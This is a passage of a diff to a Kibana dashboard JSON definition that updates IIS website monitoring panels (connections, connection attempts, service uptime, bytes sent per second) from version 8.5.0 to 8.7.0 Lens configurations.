"number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Current Connections", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.current_connections" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Current Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "ba537347-2422-4e09-931e-c0ff3ad24ca3", + "w": 13, + "x": 22, + "y": 0 + }, + "panelIndex": "ba537347-2422-4e09-931e-c0ff3ad24ca3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "abcf6552-9150-4c04-9dfb-d5be10c7210a": { + "columnOrder": [ + "32725ee9-9b18-4823-b660-266886bc1064", + "5838b61a-c214-4934-8c4b-de59fc13e6a0" + ], + "columns": { + "32725ee9-9b18-4823-b660-266886bc1064": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "5838b61a-c214-4934-8c4b-de59fc13e6a0", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - 
"yRight": 0 - }, - "layers": [ - { - "accessors": [ - "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" - ], - "layerId": "ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "7be25a00-f479-4413-ab6a-817744e0e070", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,188,0,1)", - "forAccessor": "8a0acddd-9a1d-4d55-ac1a-0687cb155d02" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "5838b61a-c214-4934-8c4b-de59fc13e6a0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Maximum Connections", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.website.network.maximum_connections" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "5838b61a-c214-4934-8c4b-de59fc13e6a0" + ], + "layerId": "abcf6552-9150-4c04-9dfb-d5be10c7210a", + "layerType": "data", + "palette": { + "name": "default", + "type": 
"palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "d366a32e-1ed5-4089-82b4-e9e34b674c43", - "w": 13, - "x": 9, - "y": 0 - }, - "panelIndex": "d366a32e-1ed5-4089-82b4-e9e34b674c43", - "title": "Current Connections", - "type": "lens", - "version": "8.5.0" + "seriesType": "bar_horizontal", + "xAccessor": "32725ee9-9b18-4823-b660-266886bc1064", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,204,202,1)", + "forAccessor": "5838b61a-c214-4934-8c4b-de59fc13e6a0" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "abcf6552-9150-4c04-9dfb-d5be10c7210a": { - "columnOrder": [ - "32725ee9-9b18-4823-b660-266886bc1064", - "5838b61a-c214-4934-8c4b-de59fc13e6a0" - ], - "columns": { - "32725ee9-9b18-4823-b660-266886bc1064": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "5838b61a-c214-4934-8c4b-de59fc13e6a0", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "5838b61a-c214-4934-8c4b-de59fc13e6a0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Maximum 
Connections", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.maximum_connections" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Maximum Connections" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", + "w": 13, + "x": 35, + "y": 0 + }, + "panelIndex": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "81b4a03a-853e-48cb-b24e-c468ed7e9567": { + "columnOrder": [ + "0a04ece1-2036-410c-834e-11b02d1d4bd1", + "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" + ], + "columns": { + "0a04ece1-2036-410c-834e-11b02d1d4bd1": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - 
"accessors": [ - "5838b61a-c214-4934-8c4b-de59fc13e6a0" - ], - "layerId": "abcf6552-9150-4c04-9dfb-d5be10c7210a", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "32725ee9-9b18-4823-b660-266886bc1064", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,204,202,1)", - "forAccessor": "5838b61a-c214-4934-8c4b-de59fc13e6a0" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Total Connection Attempts", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_connection_attempts" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" + ], + "layerId": "81b4a03a-853e-48cb-b24e-c468ed7e9567", 
+ "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "ba537347-2422-4e09-931e-c0ff3ad24ca3", - "w": 13, - "x": 22, - "y": 0 - }, - "panelIndex": "ba537347-2422-4e09-931e-c0ff3ad24ca3", - "title": "Maximum Connections", - "type": "lens", - "version": "8.5.0" + "seriesType": "bar_horizontal", + "xAccessor": "0a04ece1-2036-410c-834e-11b02d1d4bd1", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(251,158,0,1)", + "forAccessor": "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "81b4a03a-853e-48cb-b24e-c468ed7e9567": { - "columnOrder": [ - "0a04ece1-2036-410c-834e-11b02d1d4bd1", - "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" - ], - "columns": { - "0a04ece1-2036-410c-834e-11b02d1d4bd1": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - 
"sourceField": "iis.website.name" - }, - "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Total Connection Attempts", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_connection_attempts" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total Connection Attempts" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "7dbfdcf7-2742-4a48-8520-170afa068e2c", + "w": 9, + "x": 0, + "y": 12 + }, + "panelIndex": "7dbfdcf7-2742-4a48-8520-170afa068e2c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "443aa393-cacd-4c30-bff3-34efb8d6f0d0": { + "columnOrder": [ + "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", + "a928dc48-2f7e-49e9-a513-e7b125725d68", + "a928dc48-2f7e-49e9-a513-e7b125725d68X0", + "a928dc48-2f7e-49e9-a513-e7b125725d68X1" + ], + "columns": { + "a928dc48-2f7e-49e9-a513-e7b125725d68": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Service Uptime", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": " d" + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": 
{ - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" - ], - "layerId": "81b4a03a-853e-48cb-b24e-c468ed7e9567", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "0a04ece1-2036-410c-834e-11b02d1d4bd1", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(251,158,0,1)", - "forAccessor": "2d2eb68a-2e48-48b5-9059-b5f8d99b6f90" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } + "formula": "last_value(iis.website.network.service_uptime)/86400", + "isFormulaBroken": false + }, + "references": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", - "w": 13, - "x": 35, - "y": 0 - }, - "panelIndex": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8", - "title": "Total Connection Attempts", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", - "type": "index-pattern" + "a928dc48-2f7e-49e9-a513-e7b125725d68X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.website.network.service_uptime: *" + }, + "isBucketed": false, + "label": "Part of Service Uptime (Days)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": 
"iis.website.network.service_uptime" + }, + "a928dc48-2f7e-49e9-a513-e7b125725d68X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Service Uptime (Days)", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68X0", + 86400 + ], + "location": { + "max": 52, + "min": 0 + }, + "name": "divide", + "text": "last_value(iis.website.network.service_uptime)/86400", + "type": "function" } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "443aa393-cacd-4c30-bff3-34efb8d6f0d0": { - "columnOrder": [ - "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", - "a928dc48-2f7e-49e9-a513-e7b125725d68", - "a928dc48-2f7e-49e9-a513-e7b125725d68X0", - "a928dc48-2f7e-49e9-a513-e7b125725d68X1" - ], - "columns": { - "a928dc48-2f7e-49e9-a513-e7b125725d68": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Service Uptime", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": " d" - } - }, - "formula": "last_value(iis.website.network.service_uptime)/86400", - "isFormulaBroken": false - }, - "references": [ - "a928dc48-2f7e-49e9-a513-e7b125725d68X1" - ], - "scale": "ratio" - }, - "a928dc48-2f7e-49e9-a513-e7b125725d68X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.website.network.service_uptime: *" - }, - "isBucketed": false, - "label": "Part of Service Uptime (Days)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.website.network.service_uptime" - }, - "a928dc48-2f7e-49e9-a513-e7b125725d68X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Service Uptime (Days)", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "a928dc48-2f7e-49e9-a513-e7b125725d68X0", - 
86400 - ], - "location": { - "max": 52, - "min": 0 - }, - "name": "divide", - "text": "last_value(iis.website.network.service_uptime)/86400", - "type": "function" - } - }, - "references": [ - "a928dc48-2f7e-49e9-a513-e7b125725d68X0" - ], - "scale": "ratio" - }, - "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "references": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68X0" + ], + "scale": "ratio" + }, + "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "fillOpacity": 1.2, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": false - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - 
"a928dc48-2f7e-49e9-a513-e7b125725d68" - ], - "layerId": "443aa393-cacd-4c30-bff3-34efb8d6f0d0", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "bar_horizontal", - "xAccessor": "f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(211,49,21,1)", - "forAccessor": "a928dc48-2f7e-49e9-a513-e7b125725d68" - } - ] - } - ], - "legend": { - "isVisible": false, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": false - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": false - }, - "valueLabels": "show" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "fillOpacity": 1.2, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": false + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a928dc48-2f7e-49e9-a513-e7b125725d68" + ], + "layerId": "443aa393-cacd-4c30-bff3-34efb8d6f0d0", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "7dbfdcf7-2742-4a48-8520-170afa068e2c", - "w": 9, - "x": 0, - "y": 12 - }, - "panelIndex": "7dbfdcf7-2742-4a48-8520-170afa068e2c", - "title": "Service Uptime", - "type": "lens", - "version": "8.5.0" + "seriesType": "bar_horizontal", + "xAccessor": 
"f33f7d7b-0447-4e48-81e5-7c4bed2c9c8e", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(211,49,21,1)", + "forAccessor": "a928dc48-2f7e-49e9-a513-e7b125725d68" + } + ] + } + ], + "legend": { + "isVisible": false, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": false + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": false + }, + "valueLabels": "show" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Service Uptime" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", + "w": 20, + "x": 9, + "y": 12 + }, + "panelIndex": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "be28c427-cf5a-425d-95cb-16181c22def6": { + "columnOrder": [ + "eee6653d-397c-4629-a690-4dd9c3650854", + "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", + "06cdc211-50f4-4a99-ad34-2576c3421f8c" + ], + "columns": { + "06cdc211-50f4-4a99-ad34-2576c3421f8c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Sent", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "be28c427-cf5a-425d-95cb-16181c22def6": { - 
"columnOrder": [ - "eee6653d-397c-4629-a690-4dd9c3650854", - "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", - "06cdc211-50f4-4a99-ad34-2576c3421f8c" - ], - "columns": { - "06cdc211-50f4-4a99-ad34-2576c3421f8c": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Sent", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.bytes_sent_per_sec" - }, - "1ffa28f7-e90c-4c60-8fb3-80aac563db8c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "eee6653d-397c-4629-a690-4dd9c3650854": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.bytes_sent_per_sec" + }, + "1ffa28f7-e90c-4c60-8fb3-80aac563db8c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "eee6653d-397c-4629-a690-4dd9c3650854": { + "dataType": 
"string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "06cdc211-50f4-4a99-ad34-2576c3421f8c" - ], - "layerId": "be28c427-cf5a-425d-95cb-16181c22def6", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "eee6653d-397c-4629-a690-4dd9c3650854", - "xAccessor": "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "06cdc211-50f4-4a99-ad34-2576c3421f8c" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": 
"ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "06cdc211-50f4-4a99-ad34-2576c3421f8c" + ], + "layerId": "be28c427-cf5a-425d-95cb-16181c22def6", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", - "w": 20, - "x": 9, - "y": 12 - }, - "panelIndex": "5c01ce6f-2b93-439a-b5a0-d911da07af9b", - "title": "Bytes Sent/sec", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "eee6653d-397c-4629-a690-4dd9c3650854", + "xAccessor": "1ffa28f7-e90c-4c60-8fb3-80aac563db8c", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "06cdc211-50f4-4a99-ad34-2576c3421f8c" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", - "type": "index-pattern" + "title": "", + "type": "lens", 
